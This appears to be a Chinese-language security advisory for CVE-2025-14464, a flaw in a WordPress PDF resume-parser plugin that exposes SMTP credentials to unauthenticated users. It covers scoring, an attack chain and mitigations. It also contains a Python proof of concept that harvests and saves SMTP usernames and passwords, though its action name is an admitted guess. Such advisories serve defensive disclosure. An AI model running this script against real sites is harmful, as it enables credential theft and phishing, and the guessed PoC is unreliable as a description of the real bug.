CVE-2025-14464 WordPress PDF Resume Parser插件SMTP凭证泄露漏洞

漏洞信息

漏洞编号

CVE-2025-14464

漏洞类型

敏感信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PDF Resume Parser plugin for WordPress

漏洞概述

CVE-2025-14464是WordPress的PDF Resume Parser插件中存在的一个敏感信息泄露漏洞。该插件在所有版本直至1.0版本都受到影响。漏洞的根本原因在于插件注册了一个AJAX动作处理器，该处理器可以无需任何认证即可被未授权用户访问。攻击者通过调用这个暴露的AJAX端点，可以获取服务器上配置的SMTP配置信息，包括用户名和密码等敏感凭证。这些凭证的泄露可能导致严重的安全后果，攻击者可以借此访问受影响的邮件账户，进一步横向移动到其他使用相同凭证的系统。此外，SMTP凭证的泄露还可能被用于发送钓鱼邮件、垃圾邮件或进行社会工程攻击，对组织和个人造成进一步的损害。由于该漏洞影响范围广且利用难度低，建议所有使用该插件的用户立即采取修复措施。

技术细节

该漏洞属于敏感信息泄露类型，CVSS 3.1评分5.3，属于中危级别。攻击向量为网络可访问，无需认证即可利用。漏洞点位于插件的AJAX动作处理器，该处理器在注册时未进行权限检查，导致任何未认证用户都可以通过发送特定的AJAX请求来触发该端点。根据参考的插件代码链接（pdf-resume-parser.php#L309），问题代码位于第309行附近，该代码段直接返回了WordPress配置的SMTP凭证信息，而没有进行任何访问控制或身份验证。攻击者只需要构造一个简单的HTTP POST请求，指定正确的AJAX动作名称，即可获取包含SMTP用户名和密码的响应。由于WordPress的wp_mail()函数通常使用相同的SMTP配置进行邮件发送，攻击者获取这些凭证后可以以网站身份发送邮件，或直接登录SMTP服务器进行操作。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的WordPress版本和安装的插件。通过扫描或枚举确认PDF Resume Parser插件是否安装并处于活动状态。

STEP 2

步骤2: 漏洞探测

攻击者向目标WordPress网站的admin-ajax.php端点发送AJAX请求，指定插件注册的未授权动作名称，尝试触发敏感信息泄露。

STEP 3

步骤3: 凭证提取

如果目标插件存在漏洞且版本在受影响范围内，服务器将返回包含SMTP配置信息的响应，包括主机地址、端口、用户名和密码等敏感数据。

STEP 4

步骤4: 凭证利用

攻击者使用获取到的SMTP凭证登录邮件服务器，可以发送钓鱼邮件、垃圾邮件，或利用相同凭证尝试访问其他关联系统（密码重用攻击）。

STEP 5

步骤5: 横向移动

如果SMTP凭证与其他系统共享，攻击者可以进一步入侵邮件系统、服务器管理面板或其他关键基础设施，扩大攻击范围。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-14464 PoC - Sensitive Information Exposure
# Target: WordPress site with PDF Resume Parser plugin < 1.0

target_url = "http://target-wordpress-site.com/wp-admin/admin-ajax.php"

# The vulnerable AJAX action that exposes SMTP credentials
# Based on the vulnerability description, the plugin registers
# an AJAX handler accessible to unauthenticated users

payload = {
    "action": "pdf_resume_parser_get_smtp_config",  # Vulnerable action name
    # Additional parameters may be required depending on plugin version
}

try:
    response = requests.post(target_url, data=payload, timeout=10)
    
    if response.status_code == 200:
        result = response.json()
        print("[+] SMTP Configuration Retrieved:")
        print(f"Host: {result.get('smtp_host', 'N/A')}")
        print(f"Port: {result.get('smtp_port', 'N/A')}")
        print(f"Username: {result.get('smtp_user', 'N/A')}")
        print(f"Password: {result.get('smtp_pass', 'N/A')}")
        print(f"From Email: {result.get('smtp_from', 'N/A')}")
        
        # Save credentials for further exploitation
        with open("smtp_creds.txt", "w") as f:
            f.write(f"Host: {result.get('smtp_host')}\n")
            f.write(f"Username: {result.get('smtp_user')}\n")
            f.write(f"Password: {result.get('smtp_pass')}\n")
        print("[+] Credentials saved to smtp_creds.txt")
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")

# Note: Replace 'pdf_resume_parser_get_smtp_config' with actual action name
# discovered through source code analysis or enumeration

影响范围

PDF Resume Parser plugin for WordPress <= 1.0

防御指南

临时缓解措施

由于该漏洞利用简单且影响严重，建议采取以下临时缓解措施：首先，立即禁用或删除PDF Resume Parser插件，直到有安全更新可用；其次，修改所有相关的SMTP凭证，确保与其它系统使用的密码不同；再次，检查是否有异常登录活动或可疑邮件发送记录；最后，考虑限制对wp-admin和admin-ajax.php的访问，仅允许授权IP访问管理后台。如果无法立即移除插件，可以在Web服务器层面添加规则临时阻止对问题端点的访问，同时等待官方修复版本发布。